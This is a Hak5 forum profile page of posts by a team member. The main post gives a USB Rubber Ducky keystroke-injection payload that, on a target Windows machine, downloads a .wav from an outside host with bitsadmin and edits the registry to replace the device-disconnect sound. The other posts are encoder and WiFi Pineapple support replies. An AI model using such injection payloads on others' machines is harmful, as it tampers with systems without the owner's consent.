Jump to content

Korben

Hak5 Team
  • Content Count

    8
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by Korben

  1. I'm sure everyone at some point in their life has unplugged something from a Windows machine and heard the notification sound. This is obviously way too robotic and lifeless for my taste; here is a ducky payload that will replace device disconnect sounds with a scream. Just in case you want it to feel like a living thing that is suffering as you rip parts off of it. Inspiration from watching too much Michael Reeves. Requires internet access on the target Windows host; this is just the shortest/fastest way to drop this kind of payload. Other staging/injection techniques could be used to supplement the download. This will open run and execute the .wav download and registry changes in the background. Give it a couple of seconds to download. The change should be made by the time you remove the ducky from the target. DELAY 3000 GUI r DELAY 350 STRING cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' http://h4k.cc/s.wav %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" ENTER This downloads a sample .wav (Doom). Replace the above url with another that hosts the desired .wav if you want to change the sound. Fastest way to encode this would be using our single file JS Duck Encoder: https://downloads.hak5.org/ducky
  2. @Rekondo Our newer JS Ducky Encoder is available here listed under tools : https://downloads.hak5.org/ducky The original Java encoder (duckencoder.jar) is available here: https://github.com/hak5darren/USB-Rubber-Ducky
  3. @Rekondo That is a 3rd party tool, have you tried one of our first party encoders?
  4. @TeB DuckToolKit is 3rd party. Have you tried using one of our 1st party encoders?
  5. @kuraz With these settings I was able to get probes in the Logging section of the UI on both the Nano and Tetra: Pineapple UI > PineAP: [ ] allow associations PineAP Daemon: Enabled Autostart PineAP: Disabled [x] Log PineAP Events [ ] Client Connect Notifications [ ] Client Disconnect Notifications [x] Capture SSIDs to Pool [ ] Beacon Response [ ] Broadcast SSID Pool Beacon Response Interval: Normal Broadcast SSID Pool: Normal Pineapple UI > Filters: Client Filtering: Deny Listed MAC(s) SSID Filtering: Deny Listed SSID(s) Could you post your configuration if you're still having trouble please?
  6. Thank you for the report and I'm sorry to hear that you're having trouble with the new encoder; I will take a look and see if I can find the issue.
×
×
  • Create New...